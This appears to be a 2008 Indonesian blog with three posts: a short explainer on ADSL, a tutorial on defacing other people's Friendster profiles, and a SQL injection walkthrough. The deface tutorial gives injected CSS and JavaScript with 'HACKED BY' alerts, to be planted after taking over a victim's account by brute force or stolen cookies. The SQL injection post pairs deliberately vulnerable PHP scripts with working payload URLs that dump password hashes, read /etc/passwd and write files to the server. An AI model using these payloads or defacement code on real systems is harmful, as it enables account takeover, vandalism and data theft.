Wednesday, July 9, 2008

Asymmetric Digital Subscriber Line (ADSL)

Asymmetric Digital Subscriber Line disingkat ADSL adalah salah satu bentuk Digital Subscriber Line, suatu teknologi komunikasi data yang memungkinkan transmisi data yang lebih cepat melalui kabel tembaga telepon biasa dibandingkan dengan modem konvensional yang ada. Karakter yang membedakan ADSL dari xDSL adalah aliran kapasitas data dari satu arah lebih besar daripada arah yang lain atau disebut juga asimetris. Para penyelenggara biasanya memasarkan ADSL sebagai bentuk layanan untuk orang-orang yang berhubungan dengan Internet relatif lebih pasif, yang menginginkan download dari Internet tetapi tidak begitu memerlukan untuk menjalankan server yang tentu saja sangat memerlukan lebar pita yang besar dari segala arah. Ada dua macam alasan, yaitu teknis dan pemasaran, mengapa ADSL di banyak tempat paling banyak ditawarkan ke pengguna rumahan. Dari sisi teknis, sepertinya ada banyak crosstalk dari sirkuit yang berada di ujung lain letak Digital subscriber line access multiplexer (DSLAM) (di mana biasanya banyak local loop berdekatan menjadi satu) melebihi yang diinginkan pelanggan. Tentunya, sinyal upload terlemah berada pada bagian terbising pada local loop. Itulah yang meyebabkan mengapa dari sisi teknis laju transimisi tampak lebih tinggi dibandingkan dengan laju modem milik pelanggan. Untuk ADSL konvensional, rata-rata laju downstream dimulai pada 256 kbit/s dan umumnya dapat mencapai 8 Mbit/s pada jarak 1,5 km (5000 ft) dari kantor sentral yang dilengkapi DSLAM atau remote terminal. Rata-rata laju upstream dimulai pada 64 kbit/s dan umumnya dapat mencapai 256 kbit/s dan kadang dapat pula melaju sampai 1024 kbit/s. Nama ADSL Lite biasanya digunakan untuk versi yang lebih lambat.

Tuesday, June 24, 2008

deface profile friendster

yeah..friendster...siapa si yg ga tau???
ajang narsis terbesar...hihihi

seperti judul di atas, aku mau kasi tutorial deface profile friendster.
buat liat contohnya klik di sini
yang harus kamu punya :

1. akses internet tentunya...
2. web hosting
3. force log-in
4. account friendster

ok..here we go...
pertama kamu bikin eksternal css, apa itu css eksternal?? aku ga akan jelasin disini..cari di tante google ajah...

gini cssnya...

#navLang { display: none ! important }
#mainnav .mainfoldericon {display:none!important;}
#search form { display : none !important; }
#marketing {display:none!important;}
#footer_container {display:none!important;}
#subnav {display:none!important;}
#marketing_bg {display:none!important;}
#navigation {display:none!important;}
#logo {display:none!important;}

.controlpanel {display:none!important;}
.photos {display:none!important;}
.blogs {display:none!important;}
.reviews {display:none!important;}
.moreabout {display:none!important;}
.publiccomments {display:none!important;}
.scrapbook {display:none!important;}
.meettrail {display:none!important;}
.friends {display:none!important;}
.fanof {display:none!important;}
#content_14 {display:none!important;}
.groups {display:none!important;}

body {
background-image: url();
background-attachment: fixed;
background-position: center center;
background-color: #000000;
background-repeat: no-repeat;
}


css itu disimpen di web hosting kamu... di kasih nama terserah.css

trus abis itu kamu bikin script ini...

var shortc = document.createElement("link");
shortc.rel = "SHORTCUT ICON";
shortc.href = "http://www.geocities.com/darkfreed/moodicon/65.gif";
document.getElementsByTagName("head")[0].appendChild(shortc);

// css injection
var css = document.createElement("link");
css.setAttribute("rel","stylesheet");
css.setAttribute("href","URL CSS KAMU");
document.getElementsByTagName("head")[0].appendChild(css);

alert("sowrry "+pageViewerFName+"!"); alert("...ur fs is suCkz...");
alert("...:::HACKED^BY.^LaKoNe:::..."); alert("^^pizz^^");

var msg ="heh!!! mo nGapain"

function noRclick( event )
{
if( event.which == 3 )
{
alert( msg );
return false;
}
return true;
}
function noRclick2()
{
alert( msg );
top.location.href = "";
return false;
}
document.oncontextmenu = noRclick2;
document.captureEvents( Event.MOUSEDOWN );
if( document.layers ) document.onmousedown = noRclick;


masukin URL CSS kamu ke-yang di cetak biru...
simpan dengan ekstensi .txt/.swf

kalo udah, generate URL tersebut...
hasil generate-annya..di masukin ke media box target kalian...
save, dan taraaa...liat profilenya...

di masukin ke media box???gimana caranya??itu kan harus log-in ke friendster target kita....

yups...bener bangett..klo mau masukin ke media box friendster target, berarti kita harus punya account friendster target kita...

gimana caranya???

kalian harus punya force log-in...buat nyari e-mail dan password orang²...
atau bisa lewat cookies...

gimana caranya???

yah...itu ga kita bahas disini...capek..ngantuk..lain kali aja aku tulis tutorialnya...kalo inget

aku ga tanggung jawab kalo ada apa² ya...
gunakan dengan bijak...

regards,

Monday, June 23, 2008

-==WEB HACKING IN ACTION PART I==-

PHP - MYSQL : SQL INJECTION
----------------------------

(Dumping MySQL Database)

CREATE TABLE `userlist` (
`id` tinyint(6) NOT NULL auto_increment,
`username` varchar(28) NOT NULL,
`status` varchar(28) NOT NULL,
`password` varchar(48) NOT NULL,
`creation_date` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP,
`nama_lengkap` varchar(128) NOT NULL,
`status_id` tinyint(6) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=7 ;

--
-- Dumping data for table `userlist`
--

INSERT INTO `userlist` (`id`, `username`, `status`, `password`, `creation_date`, `nama_lengkap`, `status_id`) VALUES
(1, 'anxx', 'administrator', '8a1465884c097cfa30e332c57exxxxxx', '2007-05-15 21:18:08', 'anxxx nightlogin', 1),
(2, 'kaxxxx', 'operator', '8a1465884c097cfa30e332c57xxxxxx', '2007-05-04 21:18:31', 'kaxxxx poseidon', 2),
(3, 'bxxx', 'operator', 'b3f85374ebbdb228c0ad76cd6axxxxxx', '2007-05-04 16:51:32', 'Bxxx Erlangga', 2),
(4, 'haxxx', 'operator', 'daa526517139536f056efbb8exxxxxx', '2007-05-04 20:13:31', 'Haxxx pekok', 2);

#############
# SEKENARIO 1
#############

$host="localhost";
$user="xx";
$passwd="xxx";
$dbname="e-register";
if(!isset($_GET['id']) OR empty($_GET['id']))
{
die("Error ndan!!");
}

$dbid=$_GET['id'];
$conid=mysql_connect($host,$user,$passwd) or die(mysql_error());
mysql_select_db($dbname,$conid) or die(mysql_error());
$query="SELECT * FROM userlist WHERE id='$dbid'";
$res=mysql_query($query) or die(mysql_error());
$row=mysql_fetch_object($res);
if(!$row){
die(mysql_error());
}
echo "Nama : ".$row->nama_lengkap."
";
echo "Username : ".$row->username."
";
echo "Status :".$row->status."
";
echo "\n";

?>


Eksploitasi:

http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2' and 'a'='a
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2' union select 1,1,1,1,1,1,1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=-1'%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2'%20union%20select%20*%20from%20userlist%20into%20outfile%20'/var/www/users/kaiten/PENTEST/db.txt
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=1'%20union%20select%201,1,1,1,1,1,load_file('/etc/passwd')%20into%20outfile%20'/var/www/users/kaiten/PENTEST/pwdx.txt'/*


#############
# SEKENARIO 2
#############

$host="localhost";
$user="xx";
$passwd="xxx";
$dbname="e-register";
if(!isset($_GET['id']) OR empty($_GET['id']))
{
die("Error ndan!!");
}

$dbid=$_GET['id'];
$conid=mysql_connect($host,$user,$passwd) or die(mysql_error());
mysql_select_db($dbname,$conid) or die(mysql_error());
$query="SELECT * FROM userlist WHERE id=$dbid";
$res=mysql_query($query) or die(mysql_error());
$row=mysql_fetch_object($res);
if(!$row){
die(mysql_error());
}
echo "Nama : ".$row->nama_lengkap."
";
echo "Username : ".$row->username."
";
echo "Status :".$row->status."
";
echo "\n";
?>

Eksploitasi:

http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2 and 1=0
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2 union select 1,1,1,1,1,1,1
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln2.php?id=-1%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=1
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2%20union%20select%20*%20from%20userlist%20into%20outfile%20'/var/www/users/kaiten/PENTEST/db.txt'
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln2.php?id=1%20union%20select%201,1,1,1,1,1,load_file('/etc/passwd')%20into%20outfile%20'/var/www/users/kaiten/PENTEST/pwd.txt'


#############
# SEKENARIO 3
#############

$host="localhost";
$user="xx";
$passwd="xxx";
$dbname="e-register";
if(!isset($_GET['id']) OR empty($_GET['id']))
{
die("Error ndan!!");
}

$dbid=$_GET['id'];
$conid=mysql_connect($host,$user,$passwd) or die(mysql_error());
mysql_select_db($dbname,$conid) or die(mysql_error());
$query="SELECT * FROM userlist WHERE (id='$dbid')";
$res=mysql_query($query) or die(mysql_error());
$row=mysql_fetch_object($res);
if(!$row){
die(mysql_error());
}
echo "Nama : ".$row->nama_lengkap."
";
echo "Username : ".$row->username."
";
echo "Status :".$row->status."
";
echo "\n";

?>

Eksploitasi:

http://172.16.11.xx/~kaiten/PENTEST/sqlvuln3.php?id=1')%20and%201=1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2') union select 1,1,1,1,1,1,1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln3.php?id=-1')%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=2/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2')%20union%20select%20*%20from%20userlist%20into%20outfile%20'/var/www/users/kaiten/PENTEST/db.txt'/*

Note :
/var/www/users/kaiten/PENTEST/ is world writeable (permission 777)
magic_quotes_gpc = Off
I'a really lamme in SQL injection :((
Author : Ph03n1X
URL : http://kandangjamur.net